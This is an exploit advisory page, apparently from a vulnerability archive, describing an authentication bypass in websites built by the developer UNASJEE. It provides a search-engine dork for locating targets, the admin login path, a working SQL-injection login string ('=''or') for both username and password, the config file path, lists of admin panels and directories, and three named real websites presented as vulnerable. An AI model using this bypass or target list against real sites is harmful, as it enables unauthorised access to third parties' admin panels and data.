Design and Developed By UNASJEE Authentication Bypass Vulnerability

2018.09.22
Risk: Medium
Local: No
Remote: Yes
CVE: N/A
CWE: CWE-592

################################################################################################# # Exploit Title : Design and Developed By UNASJEE Authentication Bypass Vulnerability # Author [ Discovered By ] : KingSkrupellos from Cyberizm Digital Security Army # Date : 23/09/2018 # Vendor Homepage : unasjee.net # Tested On : Windows and Linux # Category : WebApps # Exploit Risk : Medium # CWE : CWE-592 - [ Authentication Bypass Issues ] ################################################################################################# # Google Dork : intext:''Designed & Developed by: UNASJEE'' intext:''Developed by: UNASJEE'' # Admin Control Panel Path : /admincp/index.php # Exploit : Admin Username : '=''or' Admin Password : '=''or' # Configuration File Directory Path : /admincp/config.inc # Useable Admin Control Panel URL Links => /admincp/mmainsections.php /admincp/edititem.php /admincp/allproducts2.php?sort=isNew /admincp/allproducts2.php?sort=isSug /admincp/allproducts.php?sort=order%20by%20ItmName /admincp/allproducts.php?sort=order%20by%20ArtNo /admincp/allproducts2.php?sort=soption /admincp/vinquiries.php /admincp/mnews.php /admincp/editemail2.php /admincp/newsletters.php /admincp/links.php /admincp/sendnewsletters.php /admincp/changepass.php /admincp/profile.php /admincp/contact2.php /admincp/f-view.php /admincp/ani.php # Directory File Paths => /admincp/sdata/itmimgs/.... /admincp/sdata/banner/.... /admincp/sdata/fviewimgs/... /admincp/sdata/itmimgs/... /admincp/sdata/mainimgs/... /admincp/sdata/mimgs/... /admincp/sdata/msecimgs/... /admincp/sdata/nextimgs/... /admincp/sdata/secbanner/... /admincp/sdata/secimgs/.. /admincp/sdata/subimgs/... ################################################################################################# # Example Vulnerable Sites => tbshandtools.com/admincp/index.php => [ Proof of Concept ] => archive.is/3fTzD chableather.com/admincp/index.php fadensports.com/admincp/config.inc ################################################################################################# # Discovered By KingSkrupellos from Cyberizm.Org Digital Security Team #################################################################################################

References:

https://www.cyberizm.org/cyberizm-design-by-unasjee-authentication-bypass-vuln.html


Vote for this issue:
50%
50%


 

Thanks for you vote!


 

Thanks for you comment!
Your message is in quarantine 48 hours.

Comment it here.


(*) - required fields.  
{{ x.nick }} | Date: {{ x.ux * 1000 | date:'yyyy-MM-dd' }} {{ x.ux * 1000 | date:'HH:mm' }} CET+1
{{ x.comment }}

Copyright 2019, cxsecurity.com

 

Back to Top